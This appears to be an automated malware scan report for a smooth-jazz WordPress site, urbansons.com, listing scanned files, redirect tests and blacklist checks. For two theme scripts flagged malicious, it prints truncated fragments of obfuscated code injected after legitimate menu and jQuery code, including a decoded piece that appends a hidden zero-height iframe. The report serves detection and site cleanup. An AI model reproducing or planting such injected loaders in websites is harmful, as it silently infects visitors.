Scanned pages/files
Request | Server response | Status |
http://www.urbansons.com/ | 200 OK Content-Length: 11195 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 992621wl416w7ueenfhneukvae.hop.clickbank.net
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Smooth Jazz, Smooth Jazz Artists, Smooth Jazz Music</title> <link rel="alternate" type="application/rss+xm ...[4303 bytes skipped]... | ||
http://www.urbansons.com/wp-content/themes/simplex/includes/js/suckerfish.js | 200 OK Content-Length: 7830 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
sfHover = function() { var sfEls = document.getElementById("page-list").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover);try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e if(f)e(s);}
Decoded script:
function () { var sfEls = document.getElementById("page-list").getElementsByTagName("LI"); for (var i = 0; i < sfEls.length; i++) { sfEls[i].onmouseover = function () {this.className += " sfhover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfhover\\b"), "");}; } } j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see
Antivirus reports:
| ||
http://www.urbansons.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php | 200 OK Content-Length: 1526 Content-Type: application/x-javascript | clean |
http://www.urbansons.com/wp-content/themes/simplex/js/jquery-1.2.6.min.js | 200 OK Content-Length: 63215 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(){var _jQuery=window.jQuery,_$=window.$;var jQuery=window.jQuery=window.$=function(selector,context){return new jQuery.fn.init(selector,context);};var quickExpr=/^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,isSimple=/^.[^:#\[\.]*$/,undefined;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}if(typeof selector=="string"){var match=quickExpr.exec(selector);if(match&&(match[1]| if(f)e(s);} /*qhk6sa6g1c*/
Antivirus reports:
| ||
http://ws.amazon.com/widgets/q?rt=tf_mfw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/urbsonsmojazb-20/8001/0d6663aa-232a-4809-95f8-ed54a2101ee9 | 200 OK Content-Length: 3289 Content-Type: application/javascript | clean |
http://cls.assoc-amazon.com/s/cls.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://cls.assoc-amazon.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: urbansons.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: urbansons.com
Referer: http://www.google.com/search?q=urbansons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=urbansons.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://urbansons.com/
Result: urbansons.com is not infected or malware details are not published yet.